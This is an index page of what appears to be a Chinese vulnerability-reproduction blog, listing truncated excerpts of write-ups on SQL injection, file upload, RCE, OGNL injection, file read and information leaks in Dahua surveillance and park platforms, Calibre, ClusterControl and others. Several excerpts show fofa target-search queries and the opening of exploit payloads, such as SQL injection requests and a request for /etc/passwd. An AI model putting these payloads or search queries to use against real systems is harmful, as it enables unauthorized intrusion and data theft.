Pages

D2-7大华-智慧园区综合管理平台-文件上传

D2-7大华-智慧园区综合管理平台-文件上传 漏洞描述: 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求p

Babing Babing Published on 2024-08-30

D2-6大华-智慧园区综合管理平台-文件上传

D2-6大华-智慧园区综合管理平台-文件上传 漏洞描述: 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 大华智慧园区综合管理平台在/emap/webservice/g

Babing Babing Published on 2024-08-30

D2-5大华-智慧园区综合管理平台-SQL

D2-5大华-智慧园区综合管理平台-SQL 漏洞描述: “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进

Babing Babing Published on 2024-08-30

D2-4大华-智慧园区综合管理平台-InformationLeakage

D2-4大华-智慧园区综合管理平台-InformationLeakage 漏洞描述: 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权,所以可以直

Babing Babing Published on 2024-08-30

D2-3大华-智慧园区综合管理平台-RCE

D2-3大华-智慧园区综合管理平台-RCE 漏洞描述: 由于大华智慧园区综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/CardSolution/card/face/sendFaceInfo接口发送恶意的序列化数据执行任意指令,造成代码执行。 网站图片: 网络测绘: f

Babing Babing Published on 2024-08-30

D2-2大华-智慧园区综合管理平台-SQL

D2-2大华-智慧园区综合管理平台-SQL 漏洞描述: 由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。 网站图片: 网络测

Babing Babing Published on 2024-08-30

D2-1大华-智慧园区综合管理平台-SQL

D2-1大华-智慧园区综合管理平台-SQL 漏洞描述: 影响版本: 由于大华智慧园区综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可

Babing Babing Published on 2024-08-30

D1-6大华-DDS数字监控系统-SQL

D1-6大华-DDS数字监控系统-SQL fofa语法: app=“dahua-DSS” 漏洞复现: payload: GET /emap/group_saveGroup?groupName=1'%20and%202333=2333%20and%20'hami'='hami&groupDesc=1

Babing Babing Published on 2024-08-30

D1-5大华-DDS数字监控系统-InformationLeakage

D1-5大华-DDS数字监控系统-InformationLeakage 漏洞描述: 大华 DSS 数字监控系统 user_edit.action 接口处存在信息泄露漏洞。未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码等信息,破解密码后可直接登录后台,使系统处于极不安全的状态。 0x03

Babing Babing Published on 2024-08-30

D1-4大华-DDS数字监控系统-OGNL注入

D1-4大华-DDS数字监控系统-OGNL注入 漏洞描述: 大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权

Babing Babing Published on 2024-08-30

D1-3大华-DDS数字监控系统-SQL

D1-3大华-DDS数字监控系统-SQL 漏洞描述: 大华综合安防监控管理平台是基于“All-In-One”理念,全新架构的综合监控管理平台,集主控,转发,存储,管理于一身,具有建设成本低、部署运维简易、组合扩展灵活、性能强悍及安全稳定高可靠等特点。较DSS7000系列升级了硬件配置,增强了性能,还

Babing Babing Published on 2024-08-30

D1-1大华-DDS数字监控系统-SQL

D1-1大华-DDS数字监控系统-SQL 漏洞描述: 大华 DSS存在SQL注入漏洞,攻击者 向 attachment_clearTempFile.action 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站

Babing Babing Published on 2024-08-30

D1-2大华-DDS数字监控系统-SQL

D1-2大华-DDS数字监控系统-SQL 漏洞描述: 大华 DSS存在SQL注入漏洞,攻击者 /portal/attachment_getAttList.action 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密

Babing Babing Published on 2024-08-30

C20-1超易-企业管理系统-SQL

C20-1超易-企业管理系统-SQL fofa语法: “超易企业管理系统” 漏洞复现: payload: POST /ajax/Login.ashx?Date=%271721821198459%27 HTTP/1.1 Host: Content-Length: 92 Accept: text/pl

Babing Babing Published on 2024-08-30

C19-1驰骋-CCFlow-SQL

C19-1驰骋-CCFlow-SQL 漏洞复现: payload: POST /WF/Comm/Handler.ashx?§DoType=RunSQL_Init§ HTTP/1.1 Host: {{Hostname}} Accept: application/json, te

Babing Babing Published on 2024-08-30

C18-2Calibre--任意文件读取

C18-2Calibre–任意文件读取 漏洞复现: payload: #! /usr/bin/env python3 # Ldwk # PoC for: CVE-2024-6781 import json import sys import requests _target = "http://

Babing Babing Published on 2024-08-30

C18-1Calibre--RCE

C18-1Calibre–RCE 漏洞复现: payload: #! /usr/bin/env python3 # PoC for: CVE-2024-6782 # Description: Unauthenticated remote code execution in 6.9.0 <= cali

Babing Babing Published on 2024-08-30

C17-1ClusterControl-任意文件读取

C17-1ClusterControl-任意文件读取 漏洞复现: payload: GET /././././//etc/passwd HTTP/1.1 Host: Accept-Encoding: identity User-Agent: python-urllib3/1.26.4

Babing Babing Published on 2024-08-30

C16-3喰星云-数字化餐饮服务系统-SQL

C16-3喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/stock.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELEC

Babing Babing Published on 2024-08-30

C16-2喰星云-数字化餐饮服务系统-SQL

C16-2喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELE

Babing Babing Published on 2024-08-30
Previous Next